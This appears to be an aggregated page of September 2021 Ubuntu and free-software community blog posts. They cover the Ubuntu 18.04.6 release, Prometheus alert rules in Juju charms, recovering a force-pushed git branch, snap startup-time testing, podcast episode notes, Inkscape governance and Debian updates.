September 17, 2021

The Ubuntu team is pleased to announce the release of Ubuntu 18.04.6 LTS (Long-Term Support) for its Desktop and Server products.

Unlike previous point releases, 18.04.6 is a refresh of the amd64 and arm64 installer media after the key revocation related to the BootHole vulnerability, re-enabling their usage on Secure Boot enabled systems. More detailed information can be found here:

Many other security updates for additional high-impact bug fixes are also included, with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS.

Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Base.

To get Ubuntu 18.04.6

In order to download Ubuntu 18.04.6, visit:

Users of Ubuntu 16.04 LTS will be offered an automatic upgrade to 18.04.6 via Update Manager. For further information about upgrading, see:

As always, upgrades to the latest version of Ubuntu are entirely free of charge.

We recommend that all users read the 18.04.6 release notes, which document caveats and workarounds for known issues, as well as more in-depth notes on the release itself. They are available at:

If you have a question, or if you think you may have found a bug but aren’t sure, you can try asking in any of the following places:

#ubuntu on

Help Shape Ubuntu

If you would like to help shape Ubuntu, take a look at the list of ways you can participate at:

About Ubuntu

Ubuntu is a full-featured Linux distribution for desktops, laptops, clouds and servers, with a fast and easy installation and regular releases. A tightly-integrated selection of excellent applications is included, and an incredible variety of add-on software is just a few clicks away.

Professional services including support are available from Canonical and hundreds of other companies around the world. For more information about support, visit:

More Information

You can learn more about Ubuntu and about this release on our website listed below:

To sign up for future Ubuntu announcements, please subscribe to Ubuntu’s very low volume announcement list at:

Originally posted to the ubuntu-announce mailing list on Fri Sep 17 08:47:54 UTC 2021 by Łukasz ‘sil2100’ Zemczak, on behalf of the Ubuntu Release Team

on September 17, 2021 11:52 PM

This post is about alert rules. Operators should ensure a baseline of observability for the software they operate. In this blog post, we cover Prometheus alert rules, how they work and their gotchas, and discuss how Prometheus alert rules can be embedded in Juju charms and how Juju topology enables the scoping of embedded alert rules to avoid inaccuracies.

In the first post of this series, we covered the general idea and benefits of model-driven observability with Juju. In the second post, we dived into the Juju topology and its benefits with respect to entity stability and metrics continuity. In the third post, we discussed how the Juju topology enables grouping and management of alerts, helps prevent alert storms, and how that relates with SRE practices.

The running example

In the remainder of this post, we will use the following example:


A depiction of three related Juju models: “lma”, “production” and “qa”. The “lma” model contains the monitoring processes; the “production” and “qa” models each contain one “users-db” Juju application, consisting of a Cassandra cluster. Both Cassandra clusters are monitored by the Prometheus deployed in the “lma” model.

In the example above, the “monitoring” relations between Prometheus and the two Cassandra clusters, each residing in a different model, result in Prometheus scraping the metrics endpoint provided by the Cassandra nodes. The cassandra-k8s charm, when related to a Prometheus charm over the “monitoring” relation, automatically sets up Instaclustr’s Cassandra Exporter on all cluster nodes. The resulting metrics endpoints are scraped by Prometheus without any manual intervention by the Juju administrator.

Prometheus alert rules

When monitoring systems using Prometheus, alert rules define anomalous situations that should trigger alerts. Below is an example of a typical alert rule definition:

alert: PrometheusTargetMissing
expr: up == 0
for: 0m
labels:
  severity: critical
annotations:
  summary: Prometheus target missing (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared."

The rule above is adapted from the excellent Awesome Prometheus alerts, which provides libraries of alert rules for a variety of technologies that can be monitored with Prometheus.

Alert rule ingredients

There are a few key parts to an alert rule:

  • The value of the “alert” field is the identifier (also known as “alertname”) of the alert rule.
  • The “expr” field specifies a PromQL query; in the example above, the query is straightforward: it looks at the values of the built-in “up” timeseries, which Prometheus sets to “1” when it successfully scrapes a target and to “0” when the scrape fails.
  • The “for” field specifies a grace period, that is, a time duration over which the condition in “expr” must hold continuously before the alert is fired. The default of the “for” field is zero, which means that the alert fires the first time the query returns a result; it is good practice to choose a less ‘twitchy’ value than this for most alerts. Overall, the goal is to strike a good trade-off between detecting issues as soon as possible and avoiding false positives resulting from flukes or transient failures.
  • The “labels” and “annotations” fields allow you to specify metadata for the alerts, such as their “severity”, “summary”, and “description”. None of the labels or annotations is strictly required, but they are customary in many setups. If you are pondering the difference between labels and annotations, it is precisely like in Kubernetes: labels are meant to be machine-readable, while annotations are for informing people. You can use labels with the built-in templating language for alert rules to generate the values of annotations, as well as specify matchers in Alertmanager routes to decide how to process those alerts.
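Putting these ingredients together, a complete rules file might look like the following sketch; the group name and the five-minute grace period are illustrative choices, not prescriptions from this post:

```yaml
groups:
  - name: example-rules        # illustrative group name
    rules:
      - alert: PrometheusTargetMissing
        expr: up == 0
        for: 5m                # a less 'twitchy' grace period than 0m
        labels:
          severity: critical
        annotations:
          summary: Prometheus target missing (instance {{ $labels.instance }})
          description: "A Prometheus target has disappeared."
```

Such a file can be validated with `promtool check rules <file>` before deploying it.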

Gotchas when specifying alert rules

There are a few things to watch out for when specifying alert rules.

Metadata consistency is key

I have already mentioned the need for consistency in your labels and annotations, with specific emphasis on the way you specify the severity of an alert. Please do not get inspired by the chaos that is “severity levels” in logging libraries (especially prevalent in the Java ecosystem). Rather, use whatever model for incident severity is defined in your operational procedures.


Scope your alert rules

Another, and maybe even bigger, gotcha is how you scope your alert rules. In the example above we conspicuously omitted a very important ingredient of a PromQL query: label filters. Label filters select which specific timeseries, across all timeseries with the same name (in our case “up”), are evaluated for the rule by Prometheus. That is, the alert rule we used as an example will trigger separately for any timeseries named “up” with a value of “0”, and generate a separate critical alert for each! This is likely not optimal: after all, not all systems are equally important, and you should be woken up at night during your rotations only when genuinely important systems are having issues. (Remember what we discussed about alert fatigue in another post!)

Assuming that your Prometheus is monitoring both production and non-production workloads, and that the “environment” label contains the identifier of the deployment, the following might be a better alert rule:

alert: PrometheusTargetMissing
expr: up{environment="production"} == 0
for: 0m
labels:
  severity: critical
annotations:
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

By filtering the “up” timeseries to those with the label “environment” matching “production”, alert rules with critical severity will be issued only for timeseries collected from production systems, rather than all of them. (By the way, if you have multiple production deployments, PromQL has a handy regexp-based matching of labels via the “=~” operator.)
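For instance, assuming production deployments carry “environment” labels like “production-eu” and “production-us” (names invented for illustration), a single regex-based matcher covers them all:

```
expr: up{environment=~"production-.*"} == 0
```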


Do not make alert rules too twitchy

Notice how, in the previous section, the revised alert rule still uses the value “0m” for the “for” key. That means that as soon as the Prometheus scraping has a hiccup, an alert is fired. Prometheus scraping occurs over networks, and the occasional fluke is pretty much a given. Moreover, depending on how you configure Prometheus’ scrape targets, there may be a lag between your workloads being decommissioned and Prometheus ceasing to scrape them, which is a strong source of false positives when alert rules are too sensitive.

Countering the over-sensitivity of alert rules is what the “for” keyword is for, but figuring out the right value is non-trivial. In general, you should select the value of “for” to be:

  • Not higher than the maximum amount of time you can tolerate for an issue to go undiscovered, which very much relates to the targets you have defined (e.g. for your Service Level Objectives).
  • Not lower than two or three times the scrape interval of the job that produces those timeseries.

The minimum tolerance for an alert rule is very interesting. Prometheus scrapes targets for metric values at a frequency specified on the scrape job, with a default of one minute. Much as the Nyquist–Shannon sampling theorem links a sampling rate to the ability to reconstruct a continuous signal without losing information, you should not set an alert rule duration too close to the sampling interval of the scrape jobs it relies on. Depending on the load on Prometheus, and on how quickly each scrape completes (after all, it is an HTTP call that most endpoints serve synchronously), you are all but guaranteed to see variability in the time interval between two successive data points in a given Prometheus timeseries. As such, you need a tolerance margin built into your “for” setting. A good rule of thumb is to set the value of “for” to two to three times the largest scrape interval of the scrape jobs producing the relevant timeseries.
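The rule of thumb above is simple arithmetic. A minimal sketch, assuming a 60-second scrape interval (the values and variable names are illustrative, not from any Prometheus tooling):

```shell
# Rule-of-thumb arithmetic for picking a "for" duration: two to three times
# the slowest scrape interval feeding the rule.
scrape_interval_s=60            # slowest relevant scrape job (Prometheus default: 1m)
factor=3                        # safety margin from the rule of thumb above
for_duration_s=$((factor * scrape_interval_s))
echo "for: ${for_duration_s}s"  # prints "for: 180s"
```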

Embedding alert rules in Juju charms

The Prometheus charm library provides easy-to-integrate means for charm authors to expose the metrics endpoints provided by applications to the Prometheus charm. Similarly, adding alert rules to a charm is as easy as adding “rule files” to a folder in your charm source code (cf. the cassandra-operator repository).

There are two interesting aspects to be discussed about alert rules embedded in charms: how to scope them, and the nature of the issues that are meant to be detected by those alert rules.

Scoping of embedded alert rules

As discussed in the section about alert scoping, it is fundamental to correctly restrict which systems are monitored by which alert rules; in Prometheus, this is achieved by applying label filters to the alert rule expression based on the timeseries labels.

When monitoring software that is operated by Juju, the Juju topology provides just what we need to ensure that alert rules embedded in a charm apply separately to each single deployment of that charm. The Juju topology is a set of labels for telemetry (and alert rules!) that uniquely identifies each instance of a workload operated by Juju. All it takes to leverage the Juju topology in alert rules is to add the %%juju_topology%% token to the label filters of the queried timeseries:

alert: PrometheusTargetMissing
expr: up{%%juju_topology%%} == 0
for: 0m
labels:
  severity: critical
annotations:
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

At runtime, the Prometheus charm replaces the %%juju_topology%% token with the actual Juju topology of the deployment, like the following:

alert: PrometheusTargetMissing
expr: up{juju_application="users-db",juju_model="production",juju_model_uuid="75fcb386-daa0-4681-8b4d-786481381ee2"} == 0
for: 0m
labels:
  severity: critical
annotations:
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

Having all the Juju topology labels reliably added to your alert rules ensures that there is a separate instance of the alert rule for every deployment of the charm, and that those rules are evaluated in isolation for each deployment. There is no possibility that your alert rule will mix data across different deployments and, in so doing, cause false positives or negatives.

Besides, something we are looking at is entirely automating the injection of the Juju topology into the timeseries queried by embedded alert rules, removing the need to add the %%juju_topology%% token at all. While this is not particularly easy to achieve (it requires a lexer and parser for PromQL, and a bunch of other machinery), it is an iterative improvement we are very much looking forward to, as it eliminates the risk of charm authors shipping incorrectly-scoped alert rules.
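The token substitution itself can be pictured as plain text templating. The following is a hypothetical sketch of the idea only, not the Prometheus charm library’s actual implementation; the label values are made up:

```shell
# Hypothetical illustration: the %%juju_topology%% token embedded in a rule
# expression is replaced with concrete Juju topology label matchers.
expr='up{%%juju_topology%%} == 0'
topology='juju_model="production",juju_application="users-db"'
scoped=$(printf '%s\n' "$expr" | sed "s/%%juju_topology%%/$topology/")
echo "$scoped"
# prints: up{juju_model="production",juju_application="users-db"} == 0
```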

Nature of embedded alert rules

When embedding alerts in a charm, the author will almost certainly specify rules aimed at detecting failure modes of the software operated by the charm. For example, in the Cassandra charm, we embed rules for detecting read and write request failures, or issues with compaction (a process Cassandra uses to optimize storage and memory use by dropping, for example, outdated data).

According to the categorization of alerts described in “My Philosophy on Alerting” by Rob Ewaschuk, such alert rules are “cause-based alerts”. Cause-based alerts can be noisy, mostly because they tend to be redundant, with multiple alert rules triggered by the same issue. For example, an undersized CPU can make Cassandra sad in many different ways all at once. However, cause-based alerts also allow you to quickly identify the source of issues, especially if you are aware of what impacts various types of issues have on your end users (“when the users-db database is down, users trying to log in will see errors”).

Of course, model-driven observability with Juju also needs a way of specifying “symptom-based” alert rules, that is, rules detecting issues that directly impact, and are visible to, end users. However, those alerts are not something a charm author can embed in a charm; rather, they are the responsibility of the Juju administrators, as the kind of alert rules one must specify depends on the overall architecture of the applications operated by Juju. We will come back to this topic in a future post.

What’s next

In this blog post I covered the basics of alerting with Prometheus, how Juju charm authors can embed alert rules within their charms, and how the Juju topology enables the scoping of these alert rules to single Juju applications, avoiding one of the pitfalls of writing alert rules. The following installments of this series will cover:

  • The benefits of Juju topology for Grafana dashboards
  • How to bundle Grafana Dashboards with your charms, and let Juju administrators import them in their Grafana deployments with one Juju relation
  • How Juju administrators can specify alert rules, which enables them to set up symptom-based monitoring for Juju-operated applications 

Meanwhile, you could start charming your applications running on Kubernetes. Also, have a look at the various charms available today for a variety of applications.

Other posts in this series

If you liked this post…

Find out about other observability workstreams at Canonical!

Also, Canonical recently joined up with renowned experts from AWS, Google, Cloudbees, and others to analyze the outcome of a comprehensive survey administered to more than 1200 KubeCon respondents. The resulting insightful report on the usage of cloud-native technologies is available here: Kubernetes and cloud native operations report 2021.

on September 17, 2021 11:50 AM

So you just broke that PR you’ve been working on for months?

One day, you find yourself force pushing over your already existing Pull request/branch, because like me, you like to reuse funny names:

git fetch origin
git checkout tellmewhy #already exists and has a pull request still open, but you didn't know
git reset --hard origin/master
# hack hack hack
git commit $files
git push -f nameofmyremote



Here’s when you realize that you’ve done something wrong, very very wrong, because GitHub will throw this message:

Error creating pull request: Unprocessable Entity (HTTP 422)
A pull request already exists for foursixnine:tellmewhy.

So, you already broke your old PR with a completely unrelated change,

what do you do?

Don’t panic

don't panic

If you happen to know what the previous commit id was, you can always pick it up again (go to for instance and look for the PR with the branch), AND, AND, AAANDDDD, ABSOLUTELY ANDDDD, provided you haven’t run git gc.

In my case:

@foursixnine foursixnine force-pushed the tellmewhy branch from 9e86f3a to 9714c93 2 months ago

All there is to do is:

git checkout $commit
# even better:
git checkout tellmewhy          # old branch, with new unrelated commits pushed over the old ones
git checkout -b tellmewhyagain  # your new copy; open your new PR from here
git push origin tellmewhyagain  # now all is "safe" in the cloud
git checkout tellmewhy          # let's bring the dead back to life
git reset --hard 9714c93
git push -f origin tellmewhy

And this is it, you’ve brought the dead back to life
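And if you don’t even know the old commit id, git reflog usually still does (again, as long as git gc hasn’t run). Here is a self-contained demonstration of the same recovery in a throwaway repository; the repo name, identity, and file are all made up:

```shell
# Throwaway demo: "lose" a commit with reset --hard, then bring it back.
tmp=$(mktemp -d)
cd "$tmp"
git init -q demo && cd demo
git config user.email "demo@example.com"
git config user.name "Demo"
echo "v1" > file && git add file && git commit -qm "first"
echo "v2" > file && git commit -qam "second"
good=$(git rev-parse HEAD)     # the commit we are about to "lose"
git reset -q --hard HEAD~1     # oops: the branch no longer points at it
git reflog | head -n 3         # the lost commit id is still in the reflog
git reset -q --hard "$good"    # bring the dead back to life
cat file                       # prints "v2" again
```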

on September 17, 2021 12:00 AM

September 16, 2021

Ep 160 – Vai e Volla

Podcast Ubuntu Portugal

Diogo went shopping! It had been a while since our compulsive shopper last treated himself to a tech acquisition; this time it was a Volla phone… Carrondo has been installing exbin and expanding Devolo networks.

You know the drill: listen, subscribe and share!



You can support the podcast by using the Humble Bundle affiliate links: when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal.
You can get all of this for 15 dollars, or different tiers depending on whether you pay 1, or 8.
We think it is worth well more than 15 dollars, so if you can, pay a little extra, since you have the option to pay as much as you like.

If you are interested in other bundles not listed in the notes, use the link and you will also be supporting us.

Attribution and licenses

This episode was produced by Diogo Constantino and Tiago Carrondo and edited by Alexandre Carrapiço, “Senhor Podcast”.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, and is licensed under the terms of the [CC0 1.0 Universal License](

This episode and the image used in it are licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, the full text of which can be read here. We are open to licensing for other types of use; contact us for validation and authorization.

on September 16, 2021 09:30 PM

Snaps are used on desktop machines, servers and IoT devices. However, it’s the first group that draws the most attention and scrutiny. Due to the graphic nature of desktop applications, users are often more attuned to potential problems and issues that may arise in the desktop space than with command-line tools or software running in the background.

Application startup time is one of the common topics of discussion in the Snapcraft forums, as well as the wider Web. The standalone, confined nature of snaps means that their startup procedure differs from the classic Linux programs (like those installed via Deb or RPM files). Often, this can translate into longer startup times, which are perceived negatively. Over the years, we have talked about the various mechanisms and methods introduced into the snaps ecosystem, designed to provide performance benefits: font cache improvements, compression algorithm change, and others. Now, we want to give you a glimpse of a Skunk Works* operation inside Canonical, with focus on snaps and startup performance.


While speed improvements are always useful and warmly received by users, consistency of results is equally (if not more) important. The benefit of gaining a second is often smaller than the harm of losing that same second later in the software’s lifecycle. An application whose startup time has improved is expected to remain that way, and users will typically respond with greater negativity to a new time delay than they did to the original manifestation of the issue.

Performance-related regressions present a difficult challenge, and they tie into two main aspects of software development: actual, tangible changes in the code, and the overall understanding and control of the system.

To address these, Canonical’s Certification team uses the Checkbox test automation software suite to perform a range of hands-off regression and performance tests for different Canonical products. The tool offers a great deal of flexibility, including custom tasks and reporting. Snap testing is also available through the checkbox-desktop-snaps utility (also distributed as a snap).


By default, Checkbox will measure the cold (no cached data) and hot (cached data) startup times of 10 prominent desktop snaps on multiple hardware platforms, and report the results. But things really get interesting when we look at the environment setup.

Interaction between system and snap

Regardless of the technology and tooling used, measuring execution times in software can be tricky, because it is difficult to separate (or sanitize) the application in question from the overall system. A program that has network connectivity may report inconsistent results depending on the traffic throughput and latency. Different disk types and I/O activity will also affect the timing. There may be significant background activity on the machine, which can also introduce noise, and skew the results. The list of possible obstacles goes on and on.

In situations like these, which are designed to simulate real-life usage conditions, the idea is not to ignore or remove the common phenomena, but to normalize them in a way that will offer reliable results. For example, repeated testing during different times of the day can remove some of the variation in results related to network or disk activity.

With Checkbox and snaps, we decided to go one step further, and that is to also directly examine the impact both the operating systems and the snaps themselves have on the startup measurement results!

One change at a time

Before we can claim full understanding of the system, we need to understand how different components interact. With snaps, there are many variables that come into play. For instance, if a snap refreshes and receives an update, can we treat the new startup results as part of the same set as earlier data, or a brand new set? If there is a kernel update, can we or should we expect snap startup times not to change?

Isolating the different permutations of a typical Linux machine is not trivial. To that end, we decided to create two distinct sets of tests:

  • Immutable systems that do not have any updates, and only the installed snaps change through periodic refreshes. Whenever there is a snap update, the Checkbox testing starts, and new data is collected. This way, it is possible to determine whether any change in the startup times, for better or worse, stems from the actual changes in the snap applications.
  • Immutable snaps tested on systems that receive updates. Here, we keep snaps pegged to a specific version (e.g.: Firefox 89, VLC 3.0.8), and then trigger testing whenever there is a system change in one of the five critical components: kernel, glibc, graphics drivers, apparmor, and snapd. This way, we can correlate any changes in the startup behavior of one or more snaps to the system updates.
Example of the Firefox startup time testing on an immutable system on a sample hardware platform. The blue lines indicate any Firefox refresh in the beta channel. The testing covers multiple OS releases (20.04 shown). The significant improvement in the cold start seen on the right side of the graph can now be traced to the specific changes introduced in the particular build of the snap.

We run the tests with multiple configurations in place:

  • Hardware with different graphics cards.
  • Hardware with mechanical disks and SSD.
  • Supported LTS releases and the latest development image.

The extensible nature of the Checkbox tool allows the inclusion of any snaps, any number of snaps, and custom tests can also be added, if needed. For instance, on top of the startup times, the tool can collect screenshots, which then also allow for visual comparison of the results, like possible inconsistencies in theming among different snaps, desktop environments, and different versions of desktop environments.

From data to control

When we first started collecting the numbers on startup times, we focused on the actual figures. However, in the larger scheme of things, these values are less important than the relative differences of the collected results under different conditions for the same snaps, on the same hardware configuration. For instance, how does a snap startup time change when moving from one LTS image to another? Do kernel updates affect the results?

Once we can establish how snaps behave under various operational conditions, we can then create a baseline: minimum and maximum values, average times, and other parameters for which we can create alerts. This will allow us to identify any potentially bad results in a snap’s behavior as part of our testing, and immediately flag system changes (or snap refreshes) that may lead to a degraded user experience.


Snap startup time data collection and analysis goes beyond just making sure the snaps launch quickly, and that users have a good experience. The mechanism also allows us to much better understand the complex interaction between hardware and software, and different operating system components. As we expand our work with the Checkbox tool, we will be able to create complex formulas that tell us how kernel updates, system patches, or perhaps snap refreshes affect the startup performance. We already know that using the LZO compression for snap packaging can lead to 50-60% improvements. Perhaps adding a new library into a snap can make a big difference? Or maybe certain distro releases are faster than others?
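For reference, opting into LZO compression is a single top-level key in a snap’s snapcraft.yaml; the snap name below is made up for illustration:

```yaml
# snapcraft.yaml (fragment)
name: my-app        # illustrative snap name
compression: lzo    # default is xz; lzo decompresses faster at the cost of a larger snap
```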

At the moment, Checkbox is designed to work under the GNOME desktop environment, but we also have test builds that can collect data on KDE and Xfce, too. We’re constantly improving the framework, and we’re looking for ways to improve its usability – easier sideloading of tests, test customization, configuration, data export, etc. If you have any comments or ideas, please join our forum, and let us know.

Article written by Igor Ljubuncic and Sylvain Pineau.

* Skunk Works is an official pseudonym for Lockheed Martin’s Advanced Development Programs (ADP), formerly called Lockheed Advanced Development Projects, coined in the 1940s and since widely adopted by businesses and companies for their cool, out-of-band, secretive, or state-of-the-art projects.

Photo by lalo Hernandez on Unsplash.

on September 16, 2021 03:37 PM

S14E28 – Tanks Rewarding Gender

Ubuntu Podcast from the UK LoCo

This week we’ve been playing with Steam and the Windows Terminal. We look back at how Ubuntu has evolved over the years, bring you some command line love and go over all your feedback.

It’s Season 14 Episode 28 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

  • We discuss what we’ve been up to recently:
  • We have a little Ubuntu retrospective.
  • We share a Command Line Lurve:
    • Bash web server – serve bash command output as a web page
pip install ansi2html
while true; do
  echo -e "HTTP/1.1 200 OK\n\n$(top -b -n 1 | ansi2html)" | nc -l -k -p 8080 -q 1
done

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Toot us or Comment on our Facebook page or comment on our sub-Reddit.

on September 16, 2021 02:00 PM

September 13, 2021

Welcome to the Ubuntu Weekly Newsletter, Issue 700 for the week of September 5 – 11, 2021. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on September 13, 2021 10:34 PM

Mid-September Seasonal Update

Stephen Michael Kellat

Rather than a bullet point list I will just be brief. The ballots are posted for the November 2nd general election and I’m still trying to wrap my head around seeing my name appear on the ballot. The odds are not in my favor on this but I will do what I can to see this through.

I’ve been spending quite a bit of time away from computers. Why? Well, I’ve been in the woods looking for things throughout Indian Trails Park. The Ashtabula River gulf area has many mysteries within it that frankly cannot be explained.

The situation locally is starting to get a bit out of control. It is very hard to conduct a political campaign with the coronavirus situation in our local hospitals getting bad to the point that we are seeing overload intensive care units in one part of the state. The arguments over the use of the law to deal with the pandemic are simply overwhelming.

Things will eventually straighten out, I hope. Unfortunately that doesn’t appear to be in the immediate forecast. Rough waters remain ahead.

Tags: Life

on September 13, 2021 08:07 AM

September 09, 2021

Ep 159 – Torpedear

Podcast Ubuntu Portugal

A few corrections (always a good thing), news from the “As extensões que eu uso…” (“The extensions I use…”) segment, useful information and tips for lxc/lxd users, the wallpapers of the new Impish Indri release, and the simplification of the application process for new Ubuntu members.

You know the drill: listen, subscribe and share!



You can support the podcast by using the Humble Bundle affiliate links: when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal.
You can get all of this for 15 dollars, or different tiers depending on whether you pay 1, or 8.
We think it is worth well more than 15 dollars, so if you can, pay a little extra, since you have the option to pay as much as you like.

If you are interested in other bundles not listed in the notes, use the link and you will also be supporting us.

Attribution and licenses

This episode was produced by Diogo Constantino and Tiago Carrondo and edited by Alexandre Carrapiço, “Senhor Podcast”.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, and is licensed under the terms of the [CC0 1.0 Universal License](

This episode and the image used in it are licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, the full text of which can be read here. We are open to licensing for other types of use; contact us for validation and authorization.

on September 09, 2021 09:45 PM

S14E27 – Drip With Nods

Ubuntu Podcast from the UK LoCo

This week we’ve been buying technology from Russia and playing OpenSpades. We announce that the Ubuntu Podcast is ending and round up our favourite stories from the tech news.

It’s Season 14 Episode 27 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Toot us or Comment on our Facebook page or comment on our sub-Reddit.

on September 09, 2021 02:00 PM

September 08, 2021

When Inkscape was started, it was a loose coalition of folks that met on the Internet. We weren’t really focused on things like governance, the governance was mostly who was an admin on SourceForge (it was better back then). We got some donated server time for a website and we had a few monetary donations that Bryce handled mostly with his personal banking. Probably one of our most valuable assets, our domain, was registered to and paid for by Mentalguy himself.

Realizing that wasn’t going to last forever we started to look into ways to become a legal entity as well as a great graphics program. We decided to join the (then much smaller) Software Freedom Conservancy which has allowed us to take donations as a non-profit and connected us to legal and other services to ensure that all the details are taken care of behind the scenes. As part of joining The Conservancy we setup a project charter, and we needed some governance to go along with that. This is where we officially established what we call “The Inkscape Board” and The Conservancy calls the Project Leadership Committee. We needed a way to elect that board, for which we turned to the AUTHORS file in the Inkscape source code repository.

Today it is clear that the AUTHORS file doesn’t represent all the contributors to Inkscape. It hasn’t for a long time and realistically didn’t when we established it. But it was easy. What makes Inkscape great isn’t that it is a bunch of programmers in the corner doing programmer stuff, but that it is a collaboration between people with a variety of skill sets bringing those perspectives together to make something they couldn’t build themselves.

Who got left out? We chose a method that had a vocational bias, it preferred people who are inclined to and enjoy computer programming. As a result translators, designers, technical writers, article authors, moderators, and others were left out of our governance. And because of societal trends we picked up both a racial and gender bias in our governance. Our board has never been anything other than a group of white men.

We are now taking specific actions to correct this in the Inkscape charter and starting to officially recognize the contributions that have been slighted by this oversight.

Our core principle for recognizing contributors has always been peer review, with a rule we've called the "two patch rule." It means that with two meaningful patches that are peer-reviewed and committed, you're allowed commit rights to the repository and are added to the AUTHORS file. We want to keep this same spirit as we start to recognize a wider range of contributions, so we're looking to make it the "two peers rule." Here we'll add someone to the list of contributors if two peers who are contributors say the individual has made significant contributions. Outside of the charter, we expect each group of contributors to make a list of what they consider a significant contribution, so that potential contributors know what to expect. For instance, for developers it will likely remain patches.

We’re also taking the opportunity to build a process for contributors who move on to other projects. Life happens, interests change, and that’s a natural cycle of projects. But our old process which focused more on copyright of the code didn’t allow for contributors to be marked as retired. We will start to track who voted in elections (board members, charter changes, about screens, etc.) and contributors who fail to vote in two consecutive elections will be marked as retired. A retired contributor can return to active status by simply going through the “two peers rule.”

These are ideas to start the discussion, but we always want more input and ideas. Martin Owens will be hosting a video chat to talk about ideas surrounding how to update the Inkscape charter. Also, we welcome anyone to post on the mailing list for Inkscape governance.

As a founder it pains me to think of all the contributions that have gone unrecognized. Sure there were “thank yous” and beers at sprints, but that’s not enough. I hope this new era for Inkscape will see these contributions recognized and amplified so that Inkscape can continue to grow. The need for Free Software has only grown throughout Inkscape’s lifetime and we need to keep up!

on September 08, 2021 12:00 AM

September 07, 2021

Debian 11 (codename Bullseye) was recently released. This was the smoothest upgrade I've experienced in some 20 years as a Debian user. In my haste, I completely forgot to first upgrade dpkg and apt, doing a straight dist-upgrade instead. Nonetheless, everything worked out of the box. No unresolved dependency cycles. Via my last-mile Gigabit connection, it took about 5 minutes to upgrade and reboot. Congratulations to everyone who made this possible!
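For reference, the release notes recommend a two-stage upgrade rather than a straight dist-upgrade; a minimal sketch, assuming sources.list already points at bullseye:

```shell
# Refresh package lists from the bullseye repositories
sudo apt update

# Minimal upgrade first, so that apt and dpkg themselves are current
sudo apt upgrade --without-new-pkgs

# Then the full distribution upgrade
sudo apt full-upgrade
```

The two-stage approach avoids upgrading the whole system with the previous release's package tools.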

Since the upgrade, only a handful of bugs were found. I filed bug reports. Over these past few days, maintainers have started responding. In one particular case, my report exposed a CVE caused by code copy-pasted between two similar packages. The source package fixed its code to something more secure a few years ago, while the destination package missed the fix. The situation has been brought to the attention of Debian's security team and should be fixed over the next few days.


Having recently experienced hard-disk problems on my main desktop, upgrading to Bullseye made me revisit a few issues. One of these was the possibility of transitioning to BTRFS. The last time I investigated the possibility was back when Ubuntu briefly switched their default filesystem to BTRFS. Back then, my feeling was that BTRFS wasn't ready for mainstream. For instance, the utility to convert an EXT2/3/4 partition to BTRFS corrupted the end of the partition. No thanks. However, in recent years, many large-scale online services have migrated to BTRFS and seem to be extremely happy with the result. Additionally, Linux kernel 5 added useful features such as background defragmentation. This got me pondering whether now would be a good time to migrate to BTRFS. Sadly, it seems that the stock kernel shipping with Bullseye doesn't have any of these advanced features enabled in its configuration. Oh well.


The only point that has become problematic is my Geode hosts. For one thing, upstream Rust maintainers have decided to ignore the fact that i686 is a specification and have arbitrarily added compiler flags for more recent x86-32 CPUs to their i686 target. While Debian Rust maintainers have purposely downgraded the target, rustc still produces binaries that the Geode LX (essentially an i686 without PAE) cannot process. This affects fairly basic packages such as librsvg, which breaks SVG image support for a number of dependencies. Additionally, there have been persistent problems with systemd crashing on my Geode hosts whenever daemon-reload is issued. Then, a few days ago, problems started occurring with C++ binaries, because GCC 11 upstream enabled flags for more recent CPUs in their default i686 target. While I realize that SSE and similar recent CPU features produce better binaries, I cannot help but feel that treating CPU targets as anything other than a specification is a mistake. i686 is a specification. It is not a generic equivalent of x86-32.

on September 07, 2021 11:21 AM

September 06, 2021

Web Hooks for the Janitor

Jelmer Vernooij

The Debian Janitor is an automated system that commits fixes for (minor) issues in Debian packages that can be fixed by software. It gradually started proposing merges in early December. The first set of changes sent out ran lintian-brush on sid packages maintained in Git. This post is part of a series about the progress of the Janitor.

As covered in my post from last week, the Janitor now regularly tries to import new upstream git snapshots or upstream releases into packages in Sid.

Moving parts

There are about 30,000 packages in sid, and it usually takes a couple of weeks for the janitor to cycle through all of them. Generally speaking, there are up to three moving targets for each package:

  • The packaging repository; vcswatch regularly scans this for changes, and notifies the janitor when a repository has changed. For salsa repositories it is instantly notified through a web hook
  • The upstream release tarballs; the QA watch service regularly polls these, and the janitor scans for changes in the UDD tables with watch data (used for fresh-releases)
  • The upstream repository; there is no service in Debian that watches this at the moment (used for fresh-snapshots)

When the janitor notices that one of these three targets has changed, it prioritizes processing of the package - this means that a push to a packaging repository on salsa usually leads to a build being kicked off within 10 minutes. New upstream releases are usually noticed by QA watch within a day or so and then lead to a build. New commits in upstream repositories, however, don't get noticed today.

Note that there are no guarantees; the scheduler tries to be clever and not e.g. rebuild the same package over and over again if it’s constantly changing and takes a long time to build.

